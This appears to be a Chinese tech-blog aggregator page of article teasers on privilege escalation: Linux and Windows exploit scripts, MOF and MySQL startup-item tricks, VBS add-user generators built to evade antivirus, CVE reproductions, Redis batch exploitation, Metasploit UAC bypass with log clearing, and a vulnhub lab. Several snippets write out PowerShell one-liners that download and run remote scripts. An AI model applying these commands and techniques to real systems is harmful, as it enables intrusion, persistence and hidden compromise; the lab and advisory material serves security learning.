首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
freebsd 提权脚本
2024-09-02
linux 全自动提权 exp perl脚本
linux 全自动提权 exp perl脚本 作者: admin 日期: 2013/01/19发表评论 (0) 查看评论 国外流传过来的 地址 http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39
[原创]IIS提权工具-VBS提权脚本免杀生成器
[原创]添加系统用户 VBS提权脚本随机加密生成器[K.8] 2011-05-05 02:42:53| 分类: 原创工具 VBS提权脚本随机加密生成器[K.8] Author: QQ吻 QQ:396890445Team: Crack8_编程小组[K.8]Blog: http://qqhack8.blog.163.com 说明:无net.exe.net1.exe提权,可以试试用这个vbs脚本添加系统用户,它通过WSCRIPT.NETWORK来添加用户好处:1 防止某些人 从你提权后 忘了删除的
windows 提权脚本利用
本地加载: Import-Module Sherlock.ps1 远程加载: IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1') 项目地址: 项目地址:https://github.com/rasta-mouse/Sherlock
Oracle 10g提权测试
一直想摸索一下orcl提权的方式,今天测试了一下10g,可以成功提权. C:\wmpub>sqlplus scott/tiger@orcl SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 10月 31 07:41:29 2016 Copyright (c) 1982, 2005, Oracle. All rights reserved. 连接到:Oracle Database 10g Enterprise Edition Release 10.2
又一款linux提权辅助工具
又一款linux提权辅助工具 – Linux_Exploit_Suggester 2013-09-06 10:34 1455人阅读 评论(0) 收藏 举报 https://github.com/PenturaLabs/Linux_Exploit_Suggester Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具,如果不带任何参数运行该脚本的话,将执行uname -r返回的操作系统发行版本,或者手工输入-k参数查找指定版本号. 例子: $ perl
[原创]MOF提权下载者代码
0x001 网上的mof提权 调用的是js执行添加用户 而且有个缺陷 还不能一步到位...目标3389也连不上...也不知道上面安装了什么软件...毛然添加用户也不好比如有个类似狗之类的拦截添加用户 这样不是直接就被干了目标环境不确定,也不能轻易给人种马(要不然怎么死都不知道) 提权脚本存在几个问题1 无回显 这样我们根本不知道是否执行成功(3389根本连不了,你怎么判断用户成功了 靠运气靠猜吗?)2 不支持多语句 即使有回显 想要获取目标更多信息,难道要上传十几个mof脚本过去吗? 0x002
mof提权原理及实现
关于 mof 提权的原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行.下面简单演示下 mof 提权的过程! 首先将我们的 mof 提权脚本上传到可读写目录下,这里就不做演示了.接着我们选择 MySQL 提权项,输入我们已经获取的MySQL 账户信息,并执行如下命令: select load_file(“C:/php/APMServ5.2.6/
MySQL启动项提权
关于MySQL的启动项提权,听其名知其意.就是将一段 VBS脚本导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下,如果管理员重启了服务器,那么就会自动调用该脚本,并执行其中的用户添加及提权命令! 这里有两种思路: 1. 如果 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录存在可读写的权限,那么我们可以直接将 VBS 提权脚本上传到该目录下! VBS 提权脚本代码如下: setw
MySQL-based databases CVE-2016-6664 本地提权
@date: 2016/11/10 @author: dlive 0x00 前言 这个漏洞可以结合CVE-2016-6663使用提升权限到root 0x01 漏洞原文 # http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html ============================================= - Release date: 01.
Linux本地内核提权漏洞复现(CVE-2019-13272)
Linux本地内核提权漏洞复现(CVE-2019-13272) 一.漏洞描述 当调用PTRACE_TRACEME时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数.但是,对象struct cred的生存周期规则不允许无条件地将RCU引用转换为稳定引用. PTRACE_TRACEME获取父进程的凭证,使其能够像父进程一样执行父进程能够执行的各种操作.如果恶意低权限子进程使用PTRACE_TRACEME并且该子进程的父进程具有高权限,该子进程可获取其父
对vulnhub靶机lampiao的getshell到脏牛提权获取flag
前言: vulnhub里面的一个靶场,涉及到drupal7 cms远程代码执行漏洞(CVE-2018-7600)和脏牛提权. 靶机下载地址:https://mega.nz/#!aG4AAaDB!CBLRRYQsAhTOyPJqyjC0Blr-weMH9QMdYbPfMj0LGeM 0x01信息收集 第一步打开虚拟机要输入用户密码才能登入,这样的话也不知道ip地址: 那么我们先要获取它的ip,由于在一个内网,可以使用nmap进行扫描,我虚拟机设置的是NAT模式,那么看看NAT模式的网段 是192.
metaspolit下UAC提权以及日志清除
在获得webshell时但权限不够大,这时候为了完全获得受害者机器的权限,使用msf进行后渗透. 一.获取Meterpreter会话 Meterpreter 是msf的一个payload,目标执行之后,我们会得到一个会话,和常见的shell会话类似,但是它的功能更加强大,它是执行后渗透测试的实施通道. (1) 使用msfvenom生成payload 常用命令: (2)本地监听 监听需要用到msf的exploit/multi/handler模块,使用show options查看需要设置的参数.重要
内网渗透 day5-msf本地提权(windows)
msf本地提权 目录 1. 利用uac提权 1 2. 绕过uac认证 2 3. 利用windows本地提权漏洞进行提权 4 1. 利用uac提权 前提与目标机建立会话连接 seach local/ask 搜索关键字local/ask use 0 进入到exploit/windows/local/ask模块下 show options 查看相关参数 set FILENAME qqUPdate.exe 设置文件名qqUPdate.exe(具有迷惑性的名字都可以) set sessi
Redis 未授权访问漏洞批量提权
一.getshell前提 ①能有对 /root/.ssh/目录写入的权限 ②目标机开启22端口 二.安装依赖 sudo easy_install redis 三.使用 redis python hackredis.py usage: hackredis.py [-h] [-l IPLIST] [-p PORT] [-r ID_RSAFILE] [-sp SSH_PORT] For Example: -------------------------------------------------
MySQL提权之启动项提权
关于MySQL的启动项提权,听其名知其意.就是将一段 VBS脚本导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下,如果管理员重启了服务器,那么就会自动调用该脚本,并执行其中的用户添加及提权命令! 这里有两种思路: 1. 如果 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录存在可读写的权限,那么我们可以直接将 VBS 提权脚本上传到该目录下! VBS 提权脚本代码如下: 1 se
CGI PL PERL脚本 提权
windows 2003 下,安装ActivePerl-5.16.2.1602-MSWin32-x86-296513 IIS 添加CGI支持.并在对应网站配置下面,添加CGI后缀或PL后缀 与 对应的perlis.dll 此时,网站支持HTTP访问CGI 或者 .pl脚本. 可以用来提取,.CGI .PL权限比较大,大于ASPX. 首先上传CGI 提权执行脚本: #!/usr/bin/perl binmode(STDOUT); ); $_ = $ENV{QUERY_STRING}; s/%/ /
CVE-2016-1240 Tomcat 服务本地提权漏洞
catalogue . 漏洞背景 . 影响范围 . 漏洞原理 . 漏洞PoC . 修复方案 1. 漏洞背景 Tomcat是个运行在Apache上的应用服务器,支持运行Servlet/JSP应用程序的容器——可以将Tomcat看作是Apache的扩展,实际上Tomcat也可以独立于Apache运行.本地提权漏洞CVE-2016-1240.仅需Tomcat用户低权限,攻击者就能利用该漏洞获取到系统的ROOT权限 Relevant Link: http://legalhackers.com/advis
Linux提权基础
英文原文: Basic Linux Privilege Escalation 在开始之前,我想指出 - 我不是专家. 据我所知,在这个巨大的领域没有一个“魔法”的答案. 这只是我的发现,写出来,共享而已(是我的起点). 下面列举的项中会出现几个不同命令,都是做同样的事,在不同的场景使用可能会有不一样的亮点.我知道有更多的东西有待探索, 这只是一个基本和粗略的指导. 并不是每个命令都适用于每个系统,因为Linux版本之间有很大的不同. "It" will not jump off the
使用powershell提权的一些技巧
原文:http://fuzzysecurity.com/tutorials/16.html 翻译:http://www.myexception.cn/windows/1752546.html https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 然后是一个小技巧: powershell IEX (New-Object Net.WebClient).DownloadStrin
WINDOWS渗透与提权总结(1)
旁站路径问题: 1.读网站配置. 2.用以下VBS: 01 On Error Resume Next 02 03 If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then 04 05 MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " U
热门专题
springboot设置连接超时时间
DDNS如何设置vpn
视觉样式plain8
glidex镜像为什么用不了
u3d 鼠标点击地面控制人物8方向移动播放动画
jenkins容器怎么执行宿主机命令
suse 修改yum源为本地源
压测工具 ab post 参数文件
sendto recvfrom 导致程序崩溃
python元类原理
wget sftp下载
golang zap 写入文件并显示
qintptr类型没有有
为什么iterrows()循环更慢
hive命令设置task数量
在线URL转换二维码
vs2013创建sql数据库项目
chromium 自定义 全局变量
linux7进入救援模式
jsfrom表单怎么过去接口返回值